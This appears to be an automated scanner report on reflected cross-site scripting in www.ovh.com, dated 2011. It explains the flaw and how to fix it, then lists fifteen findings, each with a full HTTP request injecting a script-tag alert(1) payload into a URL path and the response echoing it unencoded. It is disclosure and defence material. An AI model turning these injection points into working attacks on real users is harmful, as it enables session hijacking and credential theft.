XSS, Cross Site Scripting, www.ovh.com, CWE-79, CAPEC-86

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www.ovh.com/cgi-bin/ajax/sessionAjax.cgi [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/cgi-bin/ajax/sessionAjax.cgi

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73f97"><script>alert(1)</script>acadac34e83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin73f97"><script>alert(1)</script>acadac34e83/ajax/sessionAjax.cgi?sessionId= HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Content-Type: text/xml
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:12:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10324

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
<form type="Multipart/Form-data" action="https://www.ovh.com/cgi-bin73f97"><script>alert(1)</script>acadac34e83/ajax/sessionAjax.cgi">
...[SNIP]...

1.2. http://www.ovh.com/cgi-bin/ajax/sessionAjax.cgi [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/cgi-bin/ajax/sessionAjax.cgi

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77888"><script>alert(1)</script>106866dd9a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/ajax77888"><script>alert(1)</script>106866dd9a8/sessionAjax.cgi?sessionId= HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Content-Type: text/xml
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:12:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10324

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
<form type="Multipart/Form-data" action="https://www.ovh.com/cgi-bin/ajax77888"><script>alert(1)</script>106866dd9a8/sessionAjax.cgi">
...[SNIP]...

1.3. http://www.ovh.com/cgi-bin/ajax/sessionAjax.cgi [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/cgi-bin/ajax/sessionAjax.cgi

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb58c"><script>alert(1)</script>5d2c15d1ae5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/ajax/sessionAjax.cgifb58c"><script>alert(1)</script>5d2c15d1ae5?sessionId= HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Content-Type: text/xml
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:12:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10324

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
<form type="Multipart/Form-data" action="https://www.ovh.com/cgi-bin/ajax/sessionAjax.cgifb58c"><script>alert(1)</script>5d2c15d1ae5">
...[SNIP]...

1.4. http://www.ovh.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload da795<script>alert(1)</script>6cb7c8dca04 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoda795<script>alert(1)</script>6cb7c8dca04 HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:13:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10268

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
<h2 class="black lh30" >www.ovh.com/favicon.icoda795<script>alert(1)</script>6cb7c8dca04</h2>
...[SNIP]...

1.5. http://www.ovh.com/fr/dedie/jeux/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/dedie/jeux/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 828e1<script>alert(1)</script>efca4fdf24f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr828e1<script>alert(1)</script>efca4fdf24f/dedie/jeux/ HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:12:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10271

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
<h2 class="black lh30" >www.ovh.com/fr828e1<script>alert(1)</script>efca4fdf24f/dedie/jeux/</h2>
...[SNIP]...

1.6. http://www.ovh.com/fr/dedie/jeux/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/dedie/jeux/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload de871<script>alert(1)</script>9b49ac9a26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/de871<script>alert(1)</script>9b49ac9a26/jeux/ HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:12:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10265

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
<h2 class="black lh30" >www.ovh.com/fr/de871<script>alert(1)</script>9b49ac9a26/jeux/</h2>
...[SNIP]...

1.7. http://www.ovh.com/fr/index.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/index.xml

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 89576<script>alert(1)</script>4c5c3397ed8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr89576<script>alert(1)</script>4c5c3397ed8/index.xml HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10269

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
<h2 class="black lh30" >www.ovh.com/fr89576<script>alert(1)</script>4c5c3397ed8/index.xml</h2>
...[SNIP]...

1.8. http://www.ovh.com/fr/index.xml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/index.xml

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 33d14<script>alert(1)</script>676410ac259 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/index.xml33d14<script>alert(1)</script>676410ac259 HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:12:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10269

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
<h2 class="black lh30" >www.ovh.com/fr/index.xml33d14<script>alert(1)</script>676410ac259</h2>
...[SNIP]...

1.9. http://www.ovh.com/fr/produits/dedies.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/produits/dedies.xml

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c0db6<script>alert(1)</script>87aeed54f08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /frc0db6<script>alert(1)</script>87aeed54f08/produits/dedies.xml HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10279

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
<h2 class="black lh30" >www.ovh.com/frc0db6<script>alert(1)</script>87aeed54f08/produits/dedies.xml</h2>
...[SNIP]...

1.10. http://www.ovh.com/fr/produits/dedies.xml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/produits/dedies.xml

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b3e6<script>alert(1)</script>8d90fa1c422 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/produits2b3e6<script>alert(1)</script>8d90fa1c422/dedies.xml HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:12:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10279

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
<h2 class="black lh30" >www.ovh.com/fr/produits2b3e6<script>alert(1)</script>8d90fa1c422/dedies.xml</h2>
...[SNIP]...

1.11. http://www.ovh.com/fr/produits/dedies.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/produits/dedies.xml

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 37360<script>alert(1)</script>d4af7e9e4ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/produits/dedies.xml37360<script>alert(1)</script>d4af7e9e4ce HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:12:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10279

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
<h2 class="black lh30" >www.ovh.com/fr/produits/dedies.xml37360<script>alert(1)</script>d4af7e9e4ce</h2>
...[SNIP]...

1.12. http://www.ovh.com/fr/produits/gameplan.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/produits/gameplan.xml

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 69083<script>alert(1)</script>d60bd95df7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr69083<script>alert(1)</script>d60bd95df7d/produits/gameplan.xml HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:12:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10281

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
<h2 class="black lh30" >www.ovh.com/fr69083<script>alert(1)</script>d60bd95df7d/produits/gameplan.xml</h2>
...[SNIP]...

1.13. http://www.ovh.com/fr/produits/gameplan.xml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/produits/gameplan.xml

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df0b2<script>alert(1)</script>2ce6ebc1115 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/produitsdf0b2<script>alert(1)</script>2ce6ebc1115/gameplan.xml HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:12:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10281

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
<h2 class="black lh30" >www.ovh.com/fr/produitsdf0b2<script>alert(1)</script>2ce6ebc1115/gameplan.xml</h2>
...[SNIP]...

1.14. http://www.ovh.com/fr/produits/gameplan.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/produits/gameplan.xml

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b02f<script>alert(1)</script>17b4f0648dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/produits/8b02f<script>alert(1)</script>17b4f0648dd HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:12:51 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10269

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
<h2 class="black lh30" >www.ovh.com/fr/produits/8b02f<script>alert(1)</script>17b4f0648dd</h2>
...[SNIP]...

1.15. http://www.ovh.com/fr/produits/offres_dedies.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/produits/offres_dedies.xml

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ebc68<script>alert(1)</script>fbcdea708ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /frebc68<script>alert(1)</script>fbcdea708ef/produits/offres_dedies.xml HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:12:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10286

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
